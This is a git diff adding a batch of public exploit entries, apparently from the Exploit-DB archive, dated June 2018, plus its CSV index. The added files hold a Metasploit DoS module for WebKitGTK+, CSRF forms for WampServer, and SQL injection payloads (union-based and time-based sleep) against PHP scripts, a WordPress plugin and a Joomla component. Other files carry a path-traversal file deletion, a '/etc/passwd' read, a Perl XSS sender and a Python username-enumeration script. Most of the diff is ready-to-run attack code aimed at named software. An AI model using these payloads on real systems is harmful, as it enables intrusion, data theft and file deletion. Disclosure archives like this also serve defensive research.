diff --git a/exploits/linux/dos/44876.rb b/exploits/linux/dos/44876.rb new file mode 100755 index 000000000..6048c68ec --- /dev/null +++ b/exploits/linux/dos/44876.rb @@ -0,0 +1,64 @@ +## +# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS +# Author: Dhiraj Mishra +# Date: 2018-06-11 +# CVE: 2018-11646 +# +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "WebKitGTK+ WebKitFaviconDatabase DoS", + 'Description' => %q( + This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. + If successful, it could lead to application crash, resulting in denial of service. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Dhiraj Mishra', # Original discovery, disclosure + 'Hardik Mehta', # Original discovery, disclosure + 'Zubin Devnani', # Original discovery, disclosure + 'Manuel Caballero' #JS Code + ], + 'References' => [ + ['EDB', '44842'], + ['CVE', '2018-11646'], + ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'], + ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html'] + ], + 'DisclosureDate' => 'Jun 03 2018', + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = <<-JS + + JS + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/44851.txt b/exploits/php/webapps/44851.txt new file mode 100644 index 000000000..0ddf2c176 --- /dev/null +++ b/exploits/php/webapps/44851.txt @@ -0,0 +1,38 @@ +# Exploit Title: WampServer 3.0.6 - Cross-Site Request Forgery +# Date: 2018-06-11 +# Exploit Author: L0RD +# Software Link: https://ufile.io/gpqh9 +# Vendor Homepage: http://www.wampserver.com/en/ +# Version: 3.0.6 - 64bit +# Tested on: Win 10 + +# Description : +# An issue was discovered in WampServer 3.0.6 which allows a remote +# attacker to force any victim to add or delete virtual hosts. + +# POC 1 : +# Add virtual hosts exploit : + + + + Exploit + + +
+ + + + +
+ + + +# POC 2 : +# Delete virtual hosts exploit : +# Use this exploit to delete specific vhost : +# Exploit : + +
+ + +
\ No newline at end of file diff --git a/exploits/php/webapps/44866.txt b/exploits/php/webapps/44866.txt new file mode 100644 index 000000000..a8a98953e --- /dev/null +++ b/exploits/php/webapps/44866.txt @@ -0,0 +1,16 @@ +# Exploit Title: Schools Alert Management Script - SQL Injection +# Date: 2018-06-07 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ +# Category: Web Application +# Exploit Author: M3@Pandas +# Web: https://github.com/unh3x/just4cve/issues/2 +# Tested on: Linux Mint +# CVE: CVE-2018-12055 + +# Vulnerable cgi: +contact_us.php faq.php about.php photo_gallery.php privacy.php + +# Proof of Concept: + +POST http://localhost/[PATH]/photo_gallery.php DATA xxx'/**/union/**/all/**/select/**/1,user(),3,4# \ No newline at end of file diff --git a/exploits/php/webapps/44867.txt b/exploits/php/webapps/44867.txt new file mode 100644 index 000000000..c41e5a3d4 --- /dev/null +++ b/exploits/php/webapps/44867.txt @@ -0,0 +1,36 @@ +# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection +# Author: Manuel García Cárdenas +# Date: 2018-05-10 +# Software: WordPress Plugin Pie Register 3.0.9 +# CVE: CVE-2018-10969 + +# I. VULNERABILITY +# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection + +# II. BACKGROUND +# Pie-Register is a quick and easy way to brand your Registration Pages on +# WordPress sites. + +# III. DESCRIPTION +# This bug was found using the portal in the files: +# /pie-register/classes/invitation_code_pagination.php: if ( isset( +# $_GET['order'] ) && $_GET['order'] ) +# /pie-register/classes/invitation_code_pagination.php: $order = +# $_GET['order']; +# And when the query is executed, the parameter "order" it is not sanitized. +# /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order ); + +# IV. PROOF OF CONCEPT +# The following URL have been confirmed to all suffer from Time Based SQL Injection. + +GET +/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc +(original) + +GET +/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) +HTTP/1.1(2 seconds of response) + +GET +/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) +HTTP/1.1(30 seconds of response) \ No newline at end of file diff --git a/exploits/php/webapps/44868.txt b/exploits/php/webapps/44868.txt new file mode 100644 index 000000000..3fc10a407 --- /dev/null +++ b/exploits/php/webapps/44868.txt @@ -0,0 +1,23 @@ +# Exploit Title: Event Manager PHP Script Admin panel - 'events_new.php' SQL injection +# Date: 2018-06-10 +# Exploit Author: telahdihapus +# Vendor Homepage: https://codecanyon.net/user/ezcode +# Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741 +# Tested on: windows 10 + +# 1. description : +# Insert data in events_new.php do not use escape string function, +# so attacker can put qoute character and inject query in insert data. + +# 2. POC : +login in admin page http://victim.com/cms/, or you can register admin if you not have, register at http://victim.com/cms/register. + +go to http://victim.com/cms/events_new.php + +add new title, add some value and press "new type" button. you can see success notice. + +now, add payload to value. + +example payload = a'), (120, (select version()))-- - + +120 is id, you can put your cursor in delete button, to see id, and you can prediction next id. \ No newline at end of file diff --git a/exploits/php/webapps/44869.txt b/exploits/php/webapps/44869.txt new file mode 100644 index 000000000..8b156227e --- /dev/null +++ b/exploits/php/webapps/44869.txt @@ -0,0 +1,24 @@ +# # # # +# Exploit Title: Joomla! Component Ek Rishta 2.10 - SQL Injection +# Dork: N/A +# Date: 08.06.2018 +# Vendor Homepage: https://www.joomlaextensions.co.in/ +# Software Link: https://extensions.joomla.org/extension/ek-rishta/ +# Version: 2.10 +# Tested on: WiN7_x64/ +# video : https://youtu.be/UWGFVUU9AU0 +# # # # +# Exploit Author: 41!kh4224rDz +# # # # +# ------------------------------SQL +Injection---------------------------------------- +# POC: +# Parameter : user_detail&cid +# Payload : 1%' AND SLEEP(10)%23 +# +# 1) +# +http://localhost/[PATH]/index.php?option=com_ekrishta&view=user_detail&cid=941%%27%20AND%20SLEEP(10)%23 +# +# +# # # # \ No newline at end of file diff --git a/exploits/php/webapps/44870.txt b/exploits/php/webapps/44870.txt new file mode 100644 index 000000000..cfa0b1bb2 --- /dev/null +++ b/exploits/php/webapps/44870.txt @@ -0,0 +1,15 @@ +# Exploit Title: Schools Alert Management Script - Arbitrary File Deletion +# Date: 2018-06-07 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ +# Category: Web Application +# Exploit Author: M3@Pandas +# Web: https://github.com/unh3x/just4cve/issues/6 +# Tested on: Linux Mint +# CVE: CVE-2018-12053 + +# Proof of Concept: + +/delete_img.php?img=./uploads/school_logos/1528_x1.php +# notice: There is a risk of file deletion,you'd better test it combined with file upload vulnerability. +# Attackers can delete any file through parameter 'img' with '../' . \ No newline at end of file diff --git a/exploits/php/webapps/44871.pl b/exploits/php/webapps/44871.pl new file mode 100755 index 000000000..682cf6c6f --- /dev/null +++ b/exploits/php/webapps/44871.pl @@ -0,0 +1,46 @@ +# Exploit Title: userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting +# Date: 2018-06-10 +# Author: Dolev Farhi +# Vendor or Software Link: www.userspice.com +# Version: 4.3.24 +# Tested on: Ubuntu +# Payload will get executed when admin visits the audit log page + +#!/usr/bin/perl + +use strict; +use LWP::UserAgent; + +print "UserSpice 4.3.24 X-Forwarded-For XSS PoC\n"; + +if ($#ARGV != 0 ) { + print "usage: $0
\n"; + exit 1; +} + +my $server = $ARGV[0] . "/users/cron/backup.php?from=users/cron_manager.php/"; +my $ua = LWP::UserAgent->new; +my $req = HTTP::Request->new(GET => 'http://' . $server); + +print "Enter payload: "; + +my $xff = ; +chomp $xff; + +if ($xff eq "") +{ + print "Empty payload \n"; + exit 1; +} + +$req->header('X-Forwarded-For' => $xff); + +my $resp = $ua->request($req); +if ($resp->is_success) { + print "[OK] Sent payload: $xff\n"; + exit 0; +} +else { + print "[Error]: code: ", $resp->code, $resp->message, "\n"; + exit 1; +} \ No newline at end of file diff --git a/exploits/php/webapps/44872.py b/exploits/php/webapps/44872.py new file mode 100755 index 000000000..bb29766c2 --- /dev/null +++ b/exploits/php/webapps/44872.py @@ -0,0 +1,38 @@ +# Exploit Title: userSpice 4.3.24 - Username Enumeration +# Date: 2018-06-10 +# Author: Dolev Farhi +# Vendor or Software Link: www.userspice.com +# Version: 4.3.24 +# Tested on: Ubuntu + +import sys +import os.path +import requests + +print("[+] UserSpice 4.3.24 Username Enumeration") + +if len(sys.argv) != 3: + print 'Usage:', sys.argv[0], 'ip.add.re.ss', 'usernames.txt' + sys.exit(1) + +if not os.path.exists(sys.argv[2]): + print('usernames.txt does not exist') + sys.exit(1) + +headers = { + 'Origin':'http://' + sys.argv[1], + 'X-Requested-With':'XMLHttpRequest' +} + +print('Checking usernames...') + +f = open(sys.argv[2], 'r') + +for user in f: + user = user.strip() + req = requests.post('http://'+sys.argv[1]+'/users/parsers/existingUsernameCheck.php', headers=headers , + data={"username":user}) + if 'taken' in req.text: + print('[FOUND] ' + user) + else: + print('[NOT FOUND] ' + user) \ No newline at end of file diff --git a/exploits/php/webapps/44873.txt b/exploits/php/webapps/44873.txt new file mode 100644 index 000000000..29d59960f --- /dev/null +++ b/exploits/php/webapps/44873.txt @@ -0,0 +1,13 @@ +# Exploit Title: Schools Alert Management Script - 'get_sec.php' SQL Injection +# Date: 2018-06-07 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ +# Category: Web Application +# Exploit Author: M3@Pandas +# Web: https://github.com/unh3x/just4cve/issues/3 +# Tested on: Linux Mint +# CVE: CVE-2018-12052 + +# Proof of Concept: + +/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23 \ No newline at end of file diff --git a/exploits/php/webapps/44874.txt b/exploits/php/webapps/44874.txt new file mode 100644 index 000000000..f36e04461 --- /dev/null +++ b/exploits/php/webapps/44874.txt @@ -0,0 +1,13 @@ +# Exploit Title: Schools Alert Management Script - Arbitrary File Read +# Date: 2018-06-07 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ +# Category: Web Application +# Exploit Author: M3@Pandas +# Web: https://github.com/unh3x/just4cve/issues/4 +# Tested on: Linux Mint +# CVE: CVE-2018-12054 + +# Proof of Concept: + +/img.php?f=/./etc/./passwd \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c97842564..393d3a032 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5991,6 +5991,7 @@ id,file,description,date,author,type,platform,port 44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos, 44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple, 44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple, +44876,exploits/linux/dos/44876.rb,"WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS",2018-06-11,"Dhiraj Mishra",dos,linux, 44857,exploits/linux/dos/44857.html,"Gnome Web (Epiphany) < 3.28.2.1 - Denial of Service",2018-06-08,rop,dos,linux, 44859,exploits/multiple/dos/44859.html,"WebKit - WebAssembly Compilation Info Leak",2018-06-08,"Google Security Research",dos,multiple, 44860,exploits/multiple/dos/44860.js,"Google Chrome - Integer Overflow when Processing WebAssembly Locals",2018-06-08,"Google Security Research",dos,multiple, @@ -39522,8 +39523,18 @@ id,file,description,date,author,type,platform,port 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux, 44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware, 44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware, +44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php, 44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php, 44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php, 44855,exploits/php/webapps/44855.py,"Monstra CMS < 3.0.4 - Cross-Site Scripting",2018-06-07,DEEPIN2,webapps,php, 44864,exploits/hardware/webapps/44864.py,"XiongMai uc-httpd 1.0.0 - Buffer Overflow",2018-06-08,"Andrew Watson",webapps,hardware, 44865,exploits/linux/webapps/44865.txt,"Splunk < 7.0.1 - Information Disclosure",2018-06-08,KoF2002,webapps,linux, +44866,exploits/php/webapps/44866.txt,"Schools Alert Management Script - SQL Injection",2018-06-11,M3@Pandas,webapps,php, +44867,exploits/php/webapps/44867.txt,"WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection",2018-06-11,"Manuel García Cárdenas",webapps,php, +44868,exploits/php/webapps/44868.txt,"Event Manager Admin panel - 'events_new.php' SQL injection",2018-06-11,telahdihapus,webapps,php, +44869,exploits/php/webapps/44869.txt,"Joomla! Component EkRishta 2.10 - 'cid' SQL Injection",2018-06-11,41!kh4224rDz,webapps,php, +44870,exploits/php/webapps/44870.txt,"Schools Alert Management Script - Arbitrary File Deletion",2018-06-11,M3@Pandas,webapps,php, +44871,exploits/php/webapps/44871.pl,"userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting",2018-06-11,"Dolev Farhi",webapps,php, +44872,exploits/php/webapps/44872.py,"userSpice 4.3.24 - Username Enumeration",2018-06-11,"Dolev Farhi",webapps,php, +44873,exploits/php/webapps/44873.txt,"Schools Alert Management Script - 'get_sec.php' SQL Injection",2018-06-11,M3@Pandas,webapps,php, +44874,exploits/php/webapps/44874.txt,"Schools Alert Management Script - Arbitrary File Read",2018-06-11,M3@Pandas,webapps,php,